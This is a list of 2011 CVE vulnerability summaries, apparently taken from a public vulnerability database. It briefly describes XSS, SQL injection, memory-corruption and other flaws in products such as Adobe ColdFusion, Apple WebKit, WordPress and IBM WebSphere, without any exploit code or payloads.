[CVE-2011-0734] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion before 9.0.1 CHF1 allows remote attackers to inject arbitrary web script or HTML via an id parameter containing a JavaScript onLoad event handler for a BODY element, related to a "tag body" attack. NOTE: this was originally reported as affecting 9.0.1 CHF1 and earlier.
[CVE-2011-0733] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion before 9.0.1 CHF1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header in an id=- query to a .cfm file.
[CVE-2011-0732] Multiple unspecified vulnerabilities in IBM Tivoli Integrated Portal (TIP) 1.1.1.1, as used in IBM Tivoli Common Reporting (TCR) 1.2.0 before Interim Fix 9, have unknown impact and attack vectors, related to "security vulnerabilities of Websphere Application Server bundled within" and "many internal defects and APARs."
[CVE-2011-0728] Cross-site scripting (XSS) vulnerability in templatefunctions.py in Loggerhead before 1.18.1 allows remote authenticated users to inject arbitrary web script or HTML via a filename, which is not properly handled in a revision view.
[CVE-2011-0725] Absolute path traversal vulnerability in the org.debian.apt.UpdateCachePartially method in worker.py in Aptdaemon 0.40 in Ubuntu 10.10 and 11.04 allows local users to read arbitrary files via a full pathname in the sources_list argument, related to the D-Bus interface.
[CVE-2011-0717] Session fixation vulnerability in Red Hat Network (RHN) Satellite Server 5.4 allows remote attackers to hijack web sessions via unspecified vectors related to Spacewalk.
[CVE-2011-0716] The br_multicast_add_group function in net/bridge/br_multicast.c in the Linux kernel before 2.6.38, when a certain Ethernet bridge configuration is used, allows local users to cause a denial of service (memory corruption and system crash) by sending IGMP packets to a local interface.
[CVE-2011-0707] Multiple cross-site scripting (XSS) vulnerabilities in Cgi/confirm.py in GNU Mailman 2.1.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) full name or (2) username field in a confirmation message.
[CVE-2011-0706] The JNLPClassLoader class in IcedTea-Web before 1.0.1, as used in OpenJDK Runtime Environment 1.6.0, allows remote attackers to gain privileges via unknown vectors related to multiple signers and the assignment of "an inappropriate security descriptor."
[CVE-2011-0700] Multiple cross-site scripting (XSS) vulnerabilities in WordPress before 3.0.5 allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (1) the Quick/Bulk Edit title (aka post title or post_title), (2) post_status, (3) comment_status, (4) ping_status, and (5) escaping of tags within the tags meta box.
[CVE-2011-0697] Cross-site scripting (XSS) vulnerability in Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 might allow remote attackers to inject arbitrary web script or HTML via a filename associated with a file upload.
[CVE-2011-0686] Unspecified vulnerability in Opera before 11.01 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by vkontakte.ru.
[CVE-2011-0684] Opera before 11.01 does not properly handle redirections and unspecified other HTTP responses, which allows remote web servers to obtain sufficient access to local files to use these files as page resources, and consequently obtain potentially sensitive information from the contents of the files, via an unknown response manipulation.
[CVE-2011-0683] Opera before 11.01 does not properly restrict the use of opera: URLs, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.
[CVE-2011-0679] IBM WebSphere Portal 6.0.1.1 through 7.0.0.0, as used in IBM Lotus Web Content Management (WCM) and IBM Lotus Quickr for WebSphere Portal, allows remote attackers to obtain sensitive information via a "modified message."
[CVE-2011-0678] Unrestricted file upload vulnerability in the EasyEdit module in Lomtec ActiveWeb Professional 3.0 allows remote attackers to execute arbitrary code by uploading an executable file via the UploadDirectory and Accepted Extensions fields in the getImagefile component of EasyEdit.cfm.
[CVE-2011-0663] Multiple integer overflows in the Microsoft (1) JScript 5.6 through 5.8 and (2) VBScript 5.6 through 5.8 scripting engines allow remote attackers to execute arbitrary code via a crafted web page, aka "Scripting Memory Reallocation Vulnerability."
[CVE-2011-0653] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010 Gold and SP1, and SharePoint Foundation 2010, allows remote attackers to inject arbitrary web script or HTML via the URI, aka "XSS in SharePoint Calendar Vulnerability."
[CVE-2011-0641] Multiple cross-site scripting (XSS) vulnerabilities in wp-admin/admin.php in the StatPressCN plugin 1.9.0 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) what1, (2) what2, (3) what3, (4) what4, and (5) what5 parameters. NOTE: the provenance of this information is unknown.
[CVE-2011-0640] The default configuration of udev on Linux does not warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer.
[CVE-2011-0639] Apple Mac OS X does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer.
[CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer.
[CVE-2011-0613] Multiple cross-site scripting (XSS) vulnerabilities in RoboHelp 7 and 8, and RoboHelp Server 7 and 8, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to (1) wf_status.htm and (2) wf_topicfs.htm in RoboHTML/WildFireExt/TemplateStock/.
[CVE-2011-0604] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0587.
[CVE-2011-0587] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604.
[CVE-2011-0584] Session fixation vulnerability in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2011-0583] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to inject arbitrary web script or HTML via the cfform tag.
[CVE-2011-0580] Multiple cross-site scripting (XSS) vulnerabilities in the administrator console in Adobe ColdFusion 8.0 through 9.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0552] Multiple cross-site scripting (XSS) vulnerabilities in the management console in Symantec IM Manager before 8.4.18 allow remote attackers to inject arbitrary web script or HTML via the (1) refreshRateSetting parameter to IMManager/Admin/IMAdminSystemDashboard.asp, the (2) nav or (3) menuitem parameter to IMManager/Admin/IMAdminTOC_simple.asp, or the (4) action parameter to IMManager/Admin/IMAdminEdituser.asp.
[CVE-2011-0549] SQL injection vulnerability in forget.php in the management GUI in Symantec Web Gateway 4.5.x allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2011-0531] demux/mkv/mkv.hpp in the MKV demuxer plugin in VideoLAN VLC media player 1.1.6.1 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary commands via a crafted MKV (WebM or Matroska) file that triggers memory corruption, related to "class mismatching" and the MKV_IS_ID macro.
[CVE-2011-0526] Cross-site scripting (XSS) vulnerability in index.php in Vanilla Forums before 2.0.17 allows remote attackers to inject arbitrary web script or HTML via the Target parameter in a /entry/signin action.
[CVE-2011-0510] SQL injection vulnerability in cart.php in Advanced Webhost Billing System (AWBS) 2.9.2 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the oid parameter in an add_other action.
[CVE-2011-0509] Cross-site scripting (XSS) vulnerability in Vaadin before 6.4.9 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the index page.
[CVE-2011-0508] Cross-site scripting (XSS) vulnerability in system/modules/comments/Comments.php in Contao CMS 2.9.2, and possibly other versions before 2.9.3, allows remote attackers to inject arbitrary web script or HTML via the HTTP X_FORWARDED_FOR header, which is stored by system/libraries/Environment.php but not properly handled by a comments action to main.php.
[CVE-2011-0504] Multiple cross-site scripting (XSS) vulnerabilities in VaM Shop 1.6, 1.6.1, and probably earlier versions allow remote attackers to inject arbitrary web script or HTML via the (1) status parameter to admin/orders.php, (2) search parameter to admin/customers.php, or (3) STORE_NAME parameter to admin/configuration.php.
[CVE-2011-0496] Unspecified vulnerability in Sybase EAServer 5.x and 6.x before 6.3 ESD#2, as used in Appeon, Replication Server Messaging Edition (RSME), and WorkSpace, allows remote attackers to install arbitrary web services and execute arbitrary code, related to a "design vulnerability."
[CVE-2011-0494] Directory traversal vulnerability in WebSEAL in IBM Tivoli Access Manager for e-business 5.1 before 5.1.0.39-TIV-AWS-IF0040, 6.0 before 6.0.0.25-TIV-AWS-IF0026, 6.1.0 before 6.1.0.5-TIV-AWS-IF0006, and 6.1.1 before 6.1.1-TIV-AWS-FP0001 has unspecified impact and attack vectors. NOTE: this might overlap CVE-2010-4622.
[CVE-2011-0488] Stack-based buffer overflow in NTWebServer.exe in the test web service in InduSoft NTWebServer, as distributed in Advantech Studio 6.1 and InduSoft Web Studio 7.0, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long request to TCP port 80.
[CVE-2011-0486] Cross-site scripting (XSS) vulnerability in cognos.cgi in IBM Cognos 8 Business Intelligence (BI) 8.4.1 before FP1 allows remote attackers to inject arbitrary web script or HTML via the pathinfo parameter.
[CVE-2011-0480] Multiple buffer overflows in vorbis_dec.c in the Vorbis decoder in FFmpeg, as used in Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344, allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a crafted WebM file, related to buffers for (1) the channel floor and (2) the channel residue.
[CVE-2011-0462] Multiple cross-site scripting (XSS) vulnerabilities in the login page in the webui component in SUSE openSUSE Build Service (OBS) before 2.1.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0459] Cross-site scripting (XSS) vulnerability in Cyber-Ark Password Vault Web Access (PVWA) 5.0 and earlier, 5.5 through 5.5 patch 4, and 6.0 through 6.0 patch 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0457] Cross-site scripting (XSS) vulnerability in e107 0.7.22 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0456] webscript.pl in Open Ticket Request System (OTRS) 2.3.4 and earlier allows remote attackers to execute arbitrary commands via unspecified vectors, related to a "command injection vulnerability."
[CVE-2011-0455] Cross-site scripting (XSS) vulnerability in Things BBS before 2.0.3 and BBS Thread before 2.0.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0451] Multiple cross-site scripting (XSS) vulnerabilities in (1) data/Smarty/templates/default/list.tpl and (2) data/Smarty/templates/default/campaign/bloc/cart_tag.tpl in EC-CUBE before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0450] The downloads manager in Opera before 11.01 on Windows does not properly determine the pathname of the filesystem-viewing application, which allows user-assisted remote attackers to execute arbitrary code via a crafted web site that hosts an executable file.
[CVE-2011-0446] Multiple cross-site scripting (XSS) vulnerabilities in the mail_to helper in Ruby on Rails before 2.3.11, and 3.x before 3.0.4, when javascript encoding is used, allow remote attackers to inject arbitrary web script or HTML via a crafted (1) name or (2) email value.
[CVE-2011-0439] Cross-site scripting (XSS) vulnerability in Mahara 1.2.x before 1.2.7 and 1.3.x before 1.3.4 allows remote attackers to inject arbitrary web script or HTML via the Pieforms select box.
[CVE-2011-0432] Multiple SQL injection vulnerabilities in the get_userinfo method in the MySQLAuthHandler class in DAVServer/mysqlauth.py in PyWebDAV before 0.9.4.1 allow remote attackers to execute arbitrary SQL commands via the (1) user or (2) pw argument. NOTE: some of these details are obtained from third party information.
[CVE-2011-0399] Piwik before 1.1 does not prevent the rendering of the login form inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.
[CVE-2011-0392] Cisco TelePresence Recording Server devices with software 1.6.x do not require authentication for an XML-RPC interface, which allows remote attackers to perform unspecified actions via a session on TCP port 8080, aka Bug ID CSCtg35833.
[CVE-2011-0381] Cisco TelePresence Manager 1.2.x through 1.6.x allows remote attackers to perform unspecified actions and consequently execute arbitrary code via a crafted request to the Java RMI interface, related to a "command injection vulnerability," aka Bug ID CSCtf97085.
[CVE-2011-0364] The Management Console (webagent.exe) in Cisco Security Agent 5.1, 5.2, and 6.0 before 6.0.2.145 allows remote attackers to create arbitrary files and execute arbitrary code via unspecified parameters in a crafted st_upload request.
[CVE-2011-0346] Use-after-free vulnerability in the ReleaseInterface function in MSHTML.DLL in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the DOM implementation and the BreakAASpecial and BreakCircularMemoryReferences functions, as demonstrated by cross_fuzz, aka "MSHTML Memory Corruption Vulnerability."
[CVE-2011-0342] Multiple buffer overflows in the InduSoft ISSymbol ActiveX control in ISSymbol.ocx 301.1104.601.0 in InduSoft Web Studio 7.0B2 hotfix 7.0.01.04 allow remote attackers to execute arbitrary code via a long parameter to the (1) Open, (2) Close, or (3) SetCurrentLanguage method.
[CVE-2011-0341] Stack-based buffer overflow in the pdfmoz_onmouse function in apps/mozilla/moz_main.c in the MuPDF plug-in 2008.09.02 for Firefox allows remote attackers to execute arbitrary code via a crafted web site.
[CVE-2011-0340] Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value.
[CVE-2011-0316] The Administrative Console component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.15 does not properly restrict access to console servlets, which allows remote attackers to obtain potentially sensitive status information via a direct request.
[CVE-2011-0315] Cross-site scripting (XSS) vulnerability in the Servlet Engine / Web Container component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.15 allows remote attackers to inject arbitrary web script or HTML via vectors related to the lack of an error page for an application.
[CVE-2011-0314] Heap-based buffer overflow in IBM WebSphere MQ 6.0 before 6.0.2.11 and 7.0 before 7.0.1.5 allows remote authenticated users to execute arbitrary code or cause a denial of service (queue manager crash) by inserting an invalid message into the queue.
[CVE-2011-0310] Buffer overflow in IBM WebSphere MQ 7.0 before 7.0.1.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted header field in a message.
[CVE-2011-0286] Cross-site scripting (XSS) vulnerability in webdesktop/app in the BlackBerry Web Desktop Manager component in Research In Motion (RIM) BlackBerry Enterprise Server (BES) software before 5.0.2 MR5 and 5.0.3 before MR1, and BlackBerry Enterprise Server Express software 5.0.1 and 5.0.2, allows remote attackers to inject arbitrary web script or HTML via the displayErrorMessage parameter in a ManageDevices action.
[CVE-2011-0280] Multiple cross-site scripting (XSS) vulnerabilities in HP Power Manager (HPPM) 4.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the logType parameter to Contents/exportlogs.asp, (2) the Id parameter to Contents/pagehelp.asp, or the (3) SORTORD or (4) SORTCOL parameter to Contents/applicationlogs.asp. NOTE: some of these details are obtained from third party information.
[CVE-2011-0278] Unspecified vulnerability in HP Web Jetadmin 10.2 Service Release 3 and 4 allows local users to bypass intended access restrictions via unknown vectors.
[CVE-2011-0274] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 7.x through 7.55 and 8.x through 8.05, and Business Service Management (BSM) through 9.01, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-0262] Buffer overflow in the stringToSeconds function in ovutil.dll in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via large values of variables to jovgraph.exe.
[CVE-2011-0255] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0254] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0253] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0244] WebKit in Apple Safari before 5.0.6 allows user-assisted remote attackers to read arbitrary files via vectors related to improper canonicalization of URLs within RSS feeds.
[CVE-2011-0242] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via vectors involving a URL that contains a username.
[CVE-2011-0240] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0238] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0237] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0235] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0234] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0233] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0232] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0231] CFNetwork in Apple Mac OS X before 10.7.2 does not properly follow an intended cookie-storage policy, which makes it easier for remote web servers to track users via a cookie, related to a "synchronization issue."
[CVE-2011-0225] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0223] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0222] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0221] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0219] Apple Safari before 5.0.6 allows remote attackers to bypass the Same Origin Policy, and modify the rendering of text from arbitrary web sites, via a Java applet that loads fonts.
[CVE-2011-0218] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-0216] Off-by-one error in libxml in Apple Safari before 5.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow and application crash) via a crafted web site.
[CVE-2011-0214] CFNetwork in Apple Safari before 5.0.6 on Windows does not properly handle an untrusted attribute of a system root certificate, which allows remote web servers to bypass intended SSL restrictions via a certificate signed by a blacklisted certification authority.
[CVE-2011-0195] The generate-id XPath function in libxslt in Apple iOS 4.3.x before 4.3.2 allows remote attackers to obtain potentially sensitive information about heap memory addresses via a crafted web site. NOTE: this may overlap CVE-2011-1202.
[CVE-2011-0169] WebKit in Apple Safari before 5.0.4, when the Web Inspector is used, does not properly handle the window.console._inspectorCommandLineAPI property, which allows user-assisted remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted web site.
[CVE-2011-0168] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0167] The windows functionality in WebKit in Apple Safari before 5.0.4 allows remote attackers to bypass the Same Origin Policy, and force the upload of arbitrary local files from a client computer, via a crafted web site.
[CVE-2011-0166] The HTML5 drag and drop functionality in WebKit in Apple Safari before 5.0.4 allows user-assisted remote attackers to bypass the Same Origin Policy and obtain sensitive information via vectors related to the dragging of content. NOTE: this might overlap CVE-2011-0778.
[CVE-2011-0165] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0164] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0163] WebKit, as used in Apple Safari before 5.0.4 and iOS before 4.3, does not properly handle unspecified "cached resources," which allows remote attackers to cause a denial of service (resource unavailability) via a crafted web site that conducts a cache-poisoning attack.
[CVE-2011-0161] WebKit, as used in Apple Safari before 5.0.4 and iOS before 4.3, does not properly handle the Attr.style accessor, which allows remote attackers to bypass the Same Origin Policy and inject Cascading Style Sheets (CSS) token sequences via a crafted web site.
[CVE-2011-0160] WebKit, as used in Apple Safari before 5.0.4 and iOS before 4.3, does not properly handle redirects in conjunction with HTTP Basic Authentication, which might allow remote web servers to capture credentials by logging the Authorization HTTP header.
[CVE-2011-0159] The Safari Settings feature in Safari in Apple iOS 4.x before 4.3 does not properly implement the clearing of cookies during execution of the Safari application, which might make it easier for remote web servers to track users by setting a cookie.
[CVE-2011-0157] WebKit, as used in Apple iOS before 4.3, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-09-1.
[CVE-2011-0156] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0155] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0154] WebKit, as used in Apple iTunes before 10.2 on Windows and Apple iOS, does not properly implement the .sort function for JavaScript arrays, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0153] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0152] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0151] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0150] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0149] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly parse HTML elements associated with document namespaces, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to a "dangling pointer" and iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0148] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0147] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0146] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0145] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0144] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0143] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0142] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0141] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0140] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0139] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0138] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0137] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0136] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0135] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0134] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0133] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly access glyph data during layout actions for floating blocks associated with pseudo-elements, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0132] Use-after-free vulnerability in the Runin box functionality in the Cascading Style Sheets (CSS) 2.1 Visual Formatting Model implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
